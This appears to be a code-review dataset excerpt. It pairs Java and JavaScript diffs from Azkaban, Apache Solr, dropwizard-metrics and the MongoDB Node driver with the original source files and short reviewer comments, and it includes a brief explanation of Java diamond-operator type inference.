List<Executor> executors = new ArrayList<Executor>();
int executorIdCounter = 0;
Map<Integer, ArrayList<ExecutorLogEvent>> executorEvents =
new HashMap<Integer, ArrayList<ExecutorLogEvent>>();
@Override
public void uploadExecutableFlow(ExecutableFlow flow)
throws ExecutorManagerException {
flows.put(flow.getExecutionId(), flow);
flowUpdateCount++;
}
@Override
public ExecutableFlow fetchExecutableFlow(int execId)
throws ExecutorManagerException {
ExecutableFlow flow = flows.get(execId);
return ExecutableFlow.createExecutableFlowFromObject(flow.toObject());
}
@Override
public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchActiveFlows()
throws ExecutorManagerException {
return activeFlows;
}
@Override
public Pair<ExecutionReference, ExecutableFlow> fetchActiveFlowByExecId(int execId)
throws ExecutorManagerException {
return activeFlows.get(execId);
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int projectId, String flowId,
int skip, int num) throws ExecutorManagerException {
return null;
}
@Override
public void addActiveExecutableReference(ExecutionReference ref)
throws ExecutorManagerException {
refs.put(ref.getExecId(), ref);
}
@Override
public void removeActiveExecutableReference(int execId)
throws ExecutorManagerException {
refs.remove(execId);
}
public boolean hasActiveExecutableReference(int execId) {
return refs.containsKey(execId);
}
@Override
public void uploadLogFile(int execId, String name, int attempt, File... files)
throws ExecutorManagerException {
}
@Override
public void updateExecutableFlow(ExecutableFlow flow)
throws ExecutorManagerException {
ExecutableFlow toUpdate = flows.get(flow.getExecutionId());
toUpdate.applyUpdateObject((Map<String, Object>) flow.toUpdateObject(0));
flowUpdateCount++;
}
@Override
public void uploadExecutableNode(ExecutableNode node, Props inputParams)
throws ExecutorManagerException {
ExecutableNode exNode = new ExecutableNode();
exNode.fillExecutableFromMapObject(node.toObject());
nodes.put(node.getId(), exNode);
jobUpdateCount.put(node.getId(), 1);
}
@Override
public void updateExecutableNode(ExecutableNode node)
throws ExecutorManagerException {
ExecutableNode foundNode = nodes.get(node.getId());
foundNode.setEndTime(node.getEndTime());
foundNode.setStartTime(node.getStartTime());
foundNode.setStatus(node.getStatus());
foundNode.setUpdateTime(node.getUpdateTime());
Integer value = jobUpdateCount.get(node.getId());
if (value == null) {
throw new ExecutorManagerException("The node has not been uploaded");
} else {
jobUpdateCount.put(node.getId(), ++value);
}
flowUpdateCount++;
}
@Override
public int fetchNumExecutableFlows(int projectId, String flowId)
throws ExecutorManagerException {
return 0;
}
@Override
public int fetchNumExecutableFlows() throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
public int getFlowUpdateCount() {
return flowUpdateCount;
}
public Integer getNodeUpdateCount(String jobId) {
return jobUpdateCount.get(jobId);
}
@Override
public ExecutableJobInfo fetchJobInfo(int execId, String jobId, int attempt)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public boolean updateExecutableReference(int execId, long updateTime)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return true;
}
@Override
public LogData fetchLogs(int execId, String name, int attempt, int startByte,
int endByte) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int skip, int num)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(String projectContains,
String flowContains, String userNameContains, int status, long startData,
long endData, int skip, int num) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableJobInfo> fetchJobHistory(int projectId, String jobId,
int skip, int size) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public int fetchNumExecutableNodes(int projectId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
@Override
public Props fetchExecutionJobInputProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public Props fetchExecutionJobOutputProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public Pair<Props, Props> fetchExecutionJobProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableJobInfo> fetchJobInfoAttempts(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public int removeExecutionLogsByTime(long millis)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int projectId, String flowId,
int skip, int num, Status status) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<Object> fetchAttachments(int execId, String name, int attempt)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public void uploadAttachmentFile(ExecutableNode node, File file)
throws ExecutorManagerException {
// TODO Auto-generated method stub
}
@Override
public List<Executor> fetchActiveExecutors() throws ExecutorManagerException {
List<Executor> activeExecutors = new ArrayList<Executor>();
for (Executor executor : executors) {
if (executor.isActive()) {
activeExecutors.add(executor);
}
}
return activeExecutors;
}
@Override
public Executor fetchExecutor(String host, int port)
throws ExecutorManagerException {
for (Executor executor : executors) {
if (executor.getHost().equals(host) && executor.getPort() == port) {
return executor;
}
}
return null;
}
@Override
public Executor fetchExecutor(int executorId) throws ExecutorManagerException {
for (Executor executor : executors) {
if (executor.getId() == executorId) {
return executor;
}
}
return null;
}
@Override
public Executor addExecutor(String host, int port)
throws ExecutorManagerException {
Executor executor = null;
if (fetchExecutor(host, port) == null) {
executorIdCounter++;
executor = new Executor(executorIdCounter, host, port, true);
executors.add(executor);
}
return executor;
}
@Override
public void removeExecutor(String host, int port) throws ExecutorManagerException {
Executor executor = fetchExecutor(host, port);
if (executor != null) {
executorIdCounter--;
executors.remove(executor);
}
}
@Override
public void postExecutorEvent(Executor executor, EventType type, String user,
String message) throws ExecutorManagerException {
ExecutorLogEvent event =
new ExecutorLogEvent(executor.getId(), user, new Date(), type, message);
if (!executorEvents.containsKey(executor.getId())) {
executorEvents.put(executor.getId(), new ArrayList<ExecutorLogEvent>());
}
executorEvents.get(executor.getId()).add(event);
}
@Override
public List<ExecutorLogEvent> getExecutorEvents(Executor executor, int num,
int skip) throws ExecutorManagerException {
if (!executorEvents.containsKey(executor.getId())) {
List<ExecutorLogEvent> events = executorEvents.get(executor.getId());
return events.subList(skip, Math.min(num + skip - 1, events.size() - 1));
}
return null;
}
@Override
public void updateExecutor(Executor executor) throws ExecutorManagerException {
Executor oldExecutor = fetchExecutor(executor.getId());
executors.remove(oldExecutor);
executors.add(executor);
}
@Override
public List<Executor> fetchAllExecutors() throws ExecutorManagerException {
return executors;
}
@Override
public void assignExecutor(int executorId, int execId)
throws ExecutorManagerException {
ExecutionReference ref = refs.get(execId);
ref.setExecutor(fetchExecutor(executorId));
executionExecutorMapping.put(execId, executorId);
}
@Override
public Executor fetchExecutorByExecutionId(int execId) throws ExecutorManagerException {
if (executionExecutorMapping.containsKey(execId)) {
return fetchExecutor(executionExecutorMapping.get(execId));
} else {
throw new ExecutorManagerException(
"Failed to find executor with execution : " + execId);
}
}
@Override
public List<Pair<ExecutionReference, ExecutableFlow>> fetchQueuedFlows()
throws ExecutorManagerException {
List<Pair<ExecutionReference, ExecutableFlow>> queuedFlows =
new ArrayList<Pair<ExecutionReference, ExecutableFlow>>();
for (int execId : refs.keySet()) {
if (!executionExecutorMapping.containsKey(execId)) {
queuedFlows.add(new Pair<ExecutionReference, ExecutableFlow>(refs
.get(execId), flows.get(execId)));
}
}
return queuedFlows;
}
@Override
public void unassignExecutor(int executionId) throws ExecutorManagerException {
executionExecutorMapping.remove(executionId);
}
}
| 1 | 13,212 | Is Java smart enough to know the generic type here? Never knew this. | azkaban-azkaban | java |
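On the reviewer's question above: yes — since Java 7 the diamond operator infers the type argument from the target type, and in a `return` statement that target is the method's declared return type, so `return new ArrayList<>();` inside `fetchRecentlyFinishedFlows` compiles as an `ArrayList<ExecutableFlow>`. A standalone illustration (the class and method names below are invented for the demo, not part of Azkaban):

```java
import java.util.ArrayList;
import java.util.List;

class DiamondInferenceDemo {
    // The diamond in the return statement picks up <String> from the declared
    // return type List<String>; no explicit type argument is required.
    static List<String> emptyNames() {
        return new ArrayList<>();
    }

    public static void main(String[] args) {
        List<String> names = emptyNames();
        names.add("inferred as List<String>"); // adding a non-String here would not compile
        System.out.println(names);
    }
}
```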
@@ -71,7 +71,7 @@ public class BackupRepositoryFactory {
PluginInfo repo = Objects.requireNonNull(backupRepoPluginByName.get(name),
"Could not find a backup repository with name " + name);
- BackupRepository result = loader.newInstance(repo.className, BackupRepository.class);
+ BackupRepository result = loader.newInstance(repo, BackupRepository.class);
result.init(repo.initArgs);
return result;
} | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.core.backup.repository;
import java.lang.invoke.MethodHandles;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.PluginInfo;
import org.apache.solr.core.SolrResourceLoader;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class BackupRepositoryFactory {
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private final Map<String,PluginInfo> backupRepoPluginByName = new HashMap<>();
private PluginInfo defaultBackupRepoPlugin = null;
public BackupRepositoryFactory(PluginInfo[] backupRepoPlugins) {
if (backupRepoPlugins != null) {
for (int i = 0; i < backupRepoPlugins.length; i++) {
String name = backupRepoPlugins[i].name;
boolean isDefault = backupRepoPlugins[i].isDefault();
if (backupRepoPluginByName.containsKey(name)) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Duplicate backup repository with name " + name);
}
if (isDefault) {
if (this.defaultBackupRepoPlugin != null) {
throw new SolrException(ErrorCode.SERVER_ERROR, "More than one backup repository is configured as default");
}
this.defaultBackupRepoPlugin = backupRepoPlugins[i];
}
backupRepoPluginByName.put(name, backupRepoPlugins[i]);
log.info("Added backup repository with configuration params {}", backupRepoPlugins[i]);
}
if (backupRepoPlugins.length == 1) {
this.defaultBackupRepoPlugin = backupRepoPlugins[0];
}
if (this.defaultBackupRepoPlugin != null) {
log.info("Default configuration for backup repository is with configuration params {}",
defaultBackupRepoPlugin);
}
}
}
public BackupRepository newInstance(SolrResourceLoader loader, String name) {
Objects.requireNonNull(loader);
Objects.requireNonNull(name);
PluginInfo repo = Objects.requireNonNull(backupRepoPluginByName.get(name),
"Could not find a backup repository with name " + name);
BackupRepository result = loader.newInstance(repo.className, BackupRepository.class);
result.init(repo.initArgs);
return result;
}
public BackupRepository newInstance(SolrResourceLoader loader) {
if (defaultBackupRepoPlugin != null) {
return newInstance(loader, defaultBackupRepoPlugin.name);
}
LocalFileSystemRepository repo = new LocalFileSystemRepository();
repo.init(new NamedList<>());
return repo;
}
}
| 1 | 31,650 | no thought given to reload | apache-lucene-solr | java |
@@ -291,8 +291,17 @@ public abstract class ScheduledReporter implements Closeable, Reporter {
return shutdownExecutorOnStop;
}
- protected Set<MetricAttribute> getDisabledMetricAttributes() {
- return disabledMetricAttributes;
+ /**
+ * Check if Attribute disabled to be logged
+ * @param attribute metric attribute
+ * @return True if attribute is configured to be disabled
+ */
+ protected boolean isMetricAttributeDisabled(MetricAttribute attribute) {
+ if(disabledMetricAttributes != null && disabledMetricAttributes.contains(attribute)) {
+ return true;
+ }
+
+ return false;
}
private String calculateRateUnit(TimeUnit unit) { | 1 | package com.codahale.metrics;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.Closeable;
import java.util.Collections;
import java.util.Locale;
import java.util.Set;
import java.util.SortedMap;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.concurrent.atomic.AtomicInteger;
/**
* The abstract base class for all scheduled reporters (i.e., reporters which process a registry's
* metrics periodically).
*
* @see ConsoleReporter
* @see CsvReporter
* @see Slf4jReporter
*/
public abstract class ScheduledReporter implements Closeable, Reporter {
private static final Logger LOG = LoggerFactory.getLogger(ScheduledReporter.class);
/**
* A simple named thread factory.
*/
@SuppressWarnings("NullableProblems")
private static class NamedThreadFactory implements ThreadFactory {
private final ThreadGroup group;
private final AtomicInteger threadNumber = new AtomicInteger(1);
private final String namePrefix;
private NamedThreadFactory(String name) {
final SecurityManager s = System.getSecurityManager();
this.group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup();
this.namePrefix = "metrics-" + name + "-thread-";
}
@Override
public Thread newThread(Runnable r) {
final Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0);
t.setDaemon(true);
if (t.getPriority() != Thread.NORM_PRIORITY) {
t.setPriority(Thread.NORM_PRIORITY);
}
return t;
}
}
private static final AtomicInteger FACTORY_ID = new AtomicInteger();
private final MetricRegistry registry;
private final ScheduledExecutorService executor;
private final boolean shutdownExecutorOnStop;
private final Set<MetricAttribute> disabledMetricAttributes;
private ScheduledFuture<?> scheduledFuture;
private final MetricFilter filter;
private final double durationFactor;
private final String durationUnit;
private final double rateFactor;
private final String rateUnit;
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param rateUnit a unit of time
* @param durationUnit a unit of time
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit) {
this(registry, name, filter, rateUnit, durationUnit, createDefaultExecutor(name));
}
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param executor the executor to use while scheduling reporting of metrics.
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor) {
this(registry, name, filter, rateUnit, durationUnit, executor, true);
}
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param executor the executor to use while scheduling reporting of metrics.
* @param shutdownExecutorOnStop if true, then executor will be stopped in same time with this reporter
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor,
boolean shutdownExecutorOnStop) {
this(registry, name, filter, rateUnit, durationUnit, executor, shutdownExecutorOnStop,
Collections.<MetricAttribute>emptySet());
}
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor,
boolean shutdownExecutorOnStop,
Set<MetricAttribute> disabledMetricAttributes) {
this.registry = registry;
this.filter = filter;
this.executor = executor == null? createDefaultExecutor(name) : executor;
this.shutdownExecutorOnStop = shutdownExecutorOnStop;
this.rateFactor = rateUnit.toSeconds(1);
this.rateUnit = calculateRateUnit(rateUnit);
this.durationFactor = 1.0 / durationUnit.toNanos(1);
this.durationUnit = durationUnit.toString().toLowerCase(Locale.US);
this.disabledMetricAttributes = disabledMetricAttributes != null ? disabledMetricAttributes :
Collections.<MetricAttribute>emptySet();
}
/**
* Starts the reporter polling at the given period.
*
* @param period the amount of time between polls
* @param unit the unit for {@code period}
*/
public void start(long period, TimeUnit unit) {
start(period, period, unit);
}
/**
* Starts the reporter polling at the given period.
*
* @param initialDelay the time to delay the first execution
* @param period the amount of time between polls
* @param unit the unit for {@code period}
*/
synchronized public void start(long initialDelay, long period, TimeUnit unit) {
if (this.scheduledFuture != null) {
throw new IllegalArgumentException("Reporter already started");
}
this.scheduledFuture = executor.scheduleAtFixedRate(new Runnable() {
@Override
public void run() {
try {
report();
} catch (Exception ex) {
LOG.error("Exception thrown from {}#report. Exception was suppressed.", ScheduledReporter.this.getClass().getSimpleName(), ex);
}
}
}, initialDelay, period, unit);
}
/**
* Stops the reporter and if shutdownExecutorOnStop is true then shuts down its thread of execution.
*
* Uses the shutdown pattern from http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ExecutorService.html
*/
public void stop() {
if (shutdownExecutorOnStop) {
executor.shutdown(); // Disable new tasks from being submitted
try {
// Wait a while for existing tasks to terminate
if (!executor.awaitTermination(1, TimeUnit.SECONDS)) {
executor.shutdownNow(); // Cancel currently executing tasks
// Wait a while for tasks to respond to being cancelled
if (!executor.awaitTermination(1, TimeUnit.SECONDS)) {
System.err.println(getClass().getSimpleName() + ": ScheduledExecutorService did not terminate");
}
}
} catch (InterruptedException ie) {
// (Re-)Cancel if current thread also interrupted
executor.shutdownNow();
// Preserve interrupt status
Thread.currentThread().interrupt();
}
} else {
// The external manager(like JEE container) responsible for lifecycle of executor
synchronized (this) {
if (this.scheduledFuture == null) {
// was never started
return;
}
if (this.scheduledFuture.isCancelled()) {
// already cancelled
return;
}
// just cancel the scheduledFuture and exit
this.scheduledFuture.cancel(false);
try {
// Wait a while for existing tasks to terminate
scheduledFuture.get(1, TimeUnit.SECONDS);
} catch (ExecutionException e) {
// well, we should get this error when future is cancelled normally, just ignore it
} catch (InterruptedException e) {
// The thread was interrupted while waiting future to complete
// Preserve interrupt status
Thread.currentThread().interrupt();
if (!this.scheduledFuture.isDone()) {
LOG.warn("The reporting schedulingFuture is not cancelled yet");
}
} catch (TimeoutException e) {
// The last reporting cycle is still in progress, nothing wrong, just add log record
LOG.warn("The reporting schedulingFuture is not cancelled yet");
}
}
}
}
/**
* Stops the reporter and shuts down its thread of execution.
*/
@Override
public void close() {
stop();
}
/**
* Report the current values of all metrics in the registry.
*/
public void report() {
synchronized (this) {
report(registry.getGauges(filter),
registry.getCounters(filter),
registry.getHistograms(filter),
registry.getMeters(filter),
registry.getTimers(filter));
}
}
/**
* Called periodically by the polling thread. Subclasses should report all the given metrics.
*
* @param gauges all of the gauges in the registry
* @param counters all of the counters in the registry
* @param histograms all of the histograms in the registry
* @param meters all of the meters in the registry
* @param timers all of the timers in the registry
*/
public abstract void report(SortedMap<String, Gauge> gauges,
SortedMap<String, Counter> counters,
SortedMap<String, Histogram> histograms,
SortedMap<String, Meter> meters,
SortedMap<String, Timer> timers);
protected String getRateUnit() {
return rateUnit;
}
protected String getDurationUnit() {
return durationUnit;
}
protected double convertDuration(double duration) {
return duration * durationFactor;
}
protected double convertRate(double rate) {
return rate * rateFactor;
}
protected boolean isShutdownExecutorOnStop() {
return shutdownExecutorOnStop;
}
protected Set<MetricAttribute> getDisabledMetricAttributes() {
return disabledMetricAttributes;
}
private String calculateRateUnit(TimeUnit unit) {
final String s = unit.toString().toLowerCase(Locale.US);
return s.substring(0, s.length() - 1);
}
private static ScheduledExecutorService createDefaultExecutor(String name) {
return Executors.newSingleThreadScheduledExecutor(new NamedThreadFactory(name + '-' + FACTORY_ID.incrementAndGet()));
}
}
| 1 | 6,799 | Please, don't remove the `getDisabledMetricAttributes` method. All changes must be backward-compatible. | dropwizard-metrics | java |
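The review above asks for `getDisabledMetricAttributes()` to stay so that existing subclasses keep compiling. One backward-compatible shape for the same change would be to retain the accessor and let the new check delegate to it — shown here as a fragment of `ScheduledReporter`, a sketch rather than the actual upstream change (the constructor in the file above already normalizes `disabledMetricAttributes` to an empty set, so no null check is needed):

```java
protected Set<MetricAttribute> getDisabledMetricAttributes() {
    return disabledMetricAttributes;
}

/**
 * Checks whether reporting of the given metric attribute has been disabled.
 *
 * @param attribute the metric attribute to check
 * @return true if the attribute is configured to be disabled
 */
protected boolean isMetricAttributeDisabled(MetricAttribute attribute) {
    return getDisabledMetricAttributes().contains(attribute);
}
```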
@@ -195,7 +195,11 @@ function prepareDatabaseForSuite(suite, context) {
.admin()
.command({ killAllSessions: [] })
.catch(err => {
- if (err.message.match(/no such (cmd|command)/) || err.code === 11601) {
+ if (
+ err.message.match(/no such (cmd|command)/) ||
+ err.message.match(/Failed to kill on some hosts/) ||
+ err.code === 11601
+ ) {
return;
}
| 1 | 'use strict';
const path = require('path');
const fs = require('fs');
const chai = require('chai');
const expect = chai.expect;
const { EJSON } = require('bson');
const { isRecord } = require('../../../src/utils');
const TestRunnerContext = require('./context').TestRunnerContext;
const resolveConnectionString = require('./utils').resolveConnectionString;
// Promise.try alternative https://stackoverflow.com/questions/60624081/promise-try-without-bluebird/60624164?noredirect=1#comment107255389_60624164
function promiseTry(callback) {
return new Promise((resolve, reject) => {
try {
resolve(callback());
} catch (e) {
reject(e);
}
});
}
chai.use(require('chai-subset'));
chai.use(require('./matcher').default);
function escape(string) {
return string.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}
function translateClientOptions(options) {
Object.keys(options).forEach(key => {
if (['j', 'journal', 'fsync', 'wtimeout', 'wtimeoutms'].indexOf(key) >= 0) {
throw new Error(
`Unhandled write concern key needs to be added to options.writeConcern: ${key}`
);
}
if (key === 'w') {
options.writeConcern = { w: options.w };
delete options[key];
} else if (key === 'readConcernLevel') {
options.readConcern = { level: options.readConcernLevel };
delete options[key];
} else if (key === 'autoEncryptOpts') {
options.autoEncryption = Object.assign({}, options.autoEncryptOpts);
if (options.autoEncryptOpts.keyVaultNamespace == null) {
options.autoEncryption.keyVaultNamespace = 'keyvault.datakeys';
}
if (options.autoEncryptOpts.kmsProviders) {
const kmsProviders = EJSON.parse(process.env.CSFLE_KMS_PROVIDERS || 'NOT_PROVIDED');
if (options.autoEncryptOpts.kmsProviders.local) {
kmsProviders.local = options.autoEncryptOpts.kmsProviders.local;
}
if (options.autoEncryptOpts.kmsProviders.awsTemporary) {
kmsProviders.aws = {
accessKeyId: process.env.CSFLE_AWS_TEMP_ACCESS_KEY_ID,
secretAccessKey: process.env.CSFLE_AWS_TEMP_SECRET_ACCESS_KEY,
sessionToken: process.env.CSFLE_AWS_TEMP_SESSION_TOKEN
};
}
if (options.autoEncryptOpts.kmsProviders.awsTemporaryNoSessionToken) {
kmsProviders.aws = {
accessKeyId: process.env.CSFLE_AWS_TEMP_ACCESS_KEY_ID,
secretAccessKey: process.env.CSFLE_AWS_TEMP_SECRET_ACCESS_KEY
};
}
options.autoEncryption.kmsProviders = kmsProviders;
}
delete options.autoEncryptOpts;
}
});
return options;
}
function gatherTestSuites(specPath) {
return fs
.readdirSync(specPath)
.filter(x => x.indexOf('.json') !== -1)
.map(x =>
Object.assign(EJSON.parse(fs.readFileSync(path.join(specPath, x)), { relaxed: true }), {
name: path.basename(x, '.json')
})
);
}
function parseTopologies(topologies) {
if (topologies == null) {
return ['replicaset', 'sharded', 'single'];
}
return topologies;
}
function parseRunOn(runOn) {
return runOn.map(config => {
const topology = parseTopologies(config.topology);
const version = [];
if (config.minServerVersion) {
version.push(`>= ${config.minServerVersion}`);
}
if (config.maxServerVersion) {
version.push(`<= ${config.maxServerVersion}`);
}
const mongodb = version.join(' ');
return { topology, mongodb, authEnabled: !!config.authEnabled };
});
}
function generateTopologyTests(testSuites, testContext, filter) {
testSuites.forEach(testSuite => {
// TODO: remove this when SPEC-1255 is completed
let runOn = testSuite.runOn;
if (!testSuite.runOn) {
runOn = [{ minServerVersion: testSuite.minServerVersion }];
if (testSuite.maxServerVersion) {
runOn.push({ maxServerVersion: testSuite.maxServerVersion });
}
}
const environmentRequirementList = parseRunOn(runOn);
environmentRequirementList.forEach(requires => {
const suiteName = `${testSuite.name} - ${requires.topology.join()}`;
describe(suiteName, {
metadata: { requires },
test: function () {
beforeEach(() => prepareDatabaseForSuite(testSuite, testContext));
afterEach(() => testContext.cleanupAfterSuite());
testSuite.tests.forEach(spec => {
const maybeIt = shouldRunSpecTest(this.configuration, requires, spec, filter)
? it
: it.skip;
maybeIt(spec.description, function () {
let testPromise = Promise.resolve();
if (spec.failPoint) {
testPromise = testPromise.then(() => testContext.enableFailPoint(spec.failPoint));
}
// run the actual test
testPromise = testPromise.then(() =>
runTestSuiteTest(this.configuration, spec, testContext)
);
if (spec.failPoint) {
testPromise = testPromise.then(() => testContext.disableFailPoint(spec.failPoint));
}
return testPromise.then(() => validateOutcome(spec, testContext));
});
});
}
});
});
});
}
function shouldRunSpecTest(configuration, requires, spec, filter) {
if (requires.authEnabled && process.env.AUTH !== 'auth') {
// TODO(NODE-3488): We do not have a way to determine if auth is enabled in our mocha metadata
// We need to do a admin.command({getCmdLineOpts: 1}) if it errors (code=13) auth is on
return false;
}
if (
spec.operations.some(
op => op.name === 'waitForEvent' && op.arguments.event === 'PoolReadyEvent'
)
) {
// TODO(NODE-2994): Connection storms work will add new events to connection pool
return false;
}
if (spec.skipReason || (filter && typeof filter === 'function' && !filter(spec, configuration))) {
return false;
}
return true;
}
// Test runner helpers
function prepareDatabaseForSuite(suite, context) {
context.dbName = suite.database_name || 'spec_db';
context.collectionName = suite.collection_name || 'spec_collection';
const db = context.sharedClient.db(context.dbName);
if (context.skipPrepareDatabase) return Promise.resolve();
const setupPromise = db
.admin()
.command({ killAllSessions: [] })
.catch(err => {
if (err.message.match(/no such (cmd|command)/) || err.code === 11601) {
return;
}
throw err;
});
if (context.collectionName == null || context.dbName === 'admin') {
return setupPromise;
}
const coll = db.collection(context.collectionName);
return setupPromise
.then(() => coll.drop({ writeConcern: { w: 'majority' } }))
.catch(err => {
if (!err.message.match(/ns not found/)) throw err;
})
.then(() => {
if (suite.key_vault_data) {
const dataKeysCollection = context.sharedClient.db('keyvault').collection('datakeys');
return dataKeysCollection
.drop({ writeConcern: { w: 'majority' } })
.catch(err => {
if (!err.message.match(/ns not found/)) {
throw err;
}
})
.then(() => {
if (suite.key_vault_data.length) {
return dataKeysCollection.insertMany(suite.key_vault_data, {
writeConcern: { w: 'majority' }
});
}
});
}
})
.then(() => {
const options = { writeConcern: { w: 'majority' } };
if (suite.json_schema) {
options.validator = { $jsonSchema: suite.json_schema };
}
return db.createCollection(context.collectionName, options);
})
.then(() => {
if (suite.data && Array.isArray(suite.data) && suite.data.length > 0) {
return coll.insertMany(suite.data, { writeConcern: { w: 'majority' } });
}
})
.then(() => {
return context.runForAllClients(client => {
return client
.db(context.dbName)
.collection(context.collectionName)
.distinct('x')
.catch(() => {});
});
});
}
function parseSessionOptions(options) {
const result = Object.assign({}, options);
if (result.defaultTransactionOptions && result.defaultTransactionOptions.readPreference) {
result.defaultTransactionOptions.readPreference = normalizeReadPreference(
result.defaultTransactionOptions.readPreference.mode
);
}
return result;
}
const IGNORED_COMMANDS = new Set(['ismaster', 'configureFailPoint', 'endSessions']);
const SDAM_EVENTS = new Set([
'serverOpening',
'serverClosed',
'serverDescriptionChanged',
'topologyOpening',
'topologyClosed',
'topologyDescriptionChanged',
'serverHeartbeatStarted',
'serverHeartbeatSucceeded',
'serverHeartbeatFailed'
]);
const CMAP_EVENTS = new Set([
'connectionPoolCreated',
'connectionPoolClosed',
'connectionCreated',
'connectionReady',
'connectionClosed',
'connectionCheckOutStarted',
'connectionCheckOutFailed',
'connectionCheckedOut',
'connectionCheckedIn',
'connectionPoolCleared'
]);
let displayCommands = false;
function runTestSuiteTest(configuration, spec, context) {
context.commandEvents = [];
const clientOptions = translateClientOptions(
Object.assign(
{
heartbeatFrequencyMS: 100,
minHeartbeatFrequencyMS: 100,
monitorCommands: true
},
spec.clientOptions
)
);
const url = resolveConnectionString(configuration, spec, context);
const client = configuration.newClient(url, clientOptions);
CMAP_EVENTS.forEach(eventName => client.on(eventName, event => context.cmapEvents.push(event)));
SDAM_EVENTS.forEach(eventName => client.on(eventName, event => context.sdamEvents.push(event)));
let skippedInitialPing = false;
client.on('commandStarted', event => {
if (IGNORED_COMMANDS.has(event.commandName)) {
return;
}
// If credentials were provided, then the Topology sends an initial `ping` command
// that we want to skip
if (event.commandName === 'ping' && client.topology.s.credentials && !skippedInitialPing) {
skippedInitialPing = true;
return;
}
context.commandEvents.push(event);
// very useful for debugging
if (displayCommands) {
// console.dir(event, { depth: 5 });
}
});
return client.connect().then(client => {
context.testClient = client;
const sessionOptions = Object.assign({}, spec.transactionOptions);
spec.sessionOptions = spec.sessionOptions || {};
const database = client.db(context.dbName);
let session0, session1;
let savedSessionData;
if (context.useSessions) {
try {
session0 = client.startSession(
Object.assign({}, sessionOptions, parseSessionOptions(spec.sessionOptions.session0))
);
session1 = client.startSession(
Object.assign({}, sessionOptions, parseSessionOptions(spec.sessionOptions.session1))
);
savedSessionData = {
session0: JSON.parse(EJSON.stringify(session0.id)),
session1: JSON.parse(EJSON.stringify(session1.id))
};
} catch (err) {
// ignore
}
}
// enable to see useful APM debug information at the time of actual test run
// displayCommands = true;
const operationContext = {
client,
database,
collectionName: context.collectionName,
session0,
session1,
testRunner: context
};
let testPromise = Promise.resolve();
return testPromise
.then(() => testOperations(spec, operationContext))
.catch(err => {
// If the driver throws an exception / returns an error while executing this series
// of operations, store the error message.
throw err;
})
.then(() => {
const promises = [];
if (session0) promises.push(session0.endSession());
if (session1) promises.push(session1.endSession());
return Promise.all(promises);
})
.then(() => validateExpectations(context.commandEvents, spec, savedSessionData));
});
}
function validateOutcome(testData, testContext) {
if (testData.outcome && testData.outcome.collection) {
const outcomeCollection = testData.outcome.collection.name || testContext.collectionName;
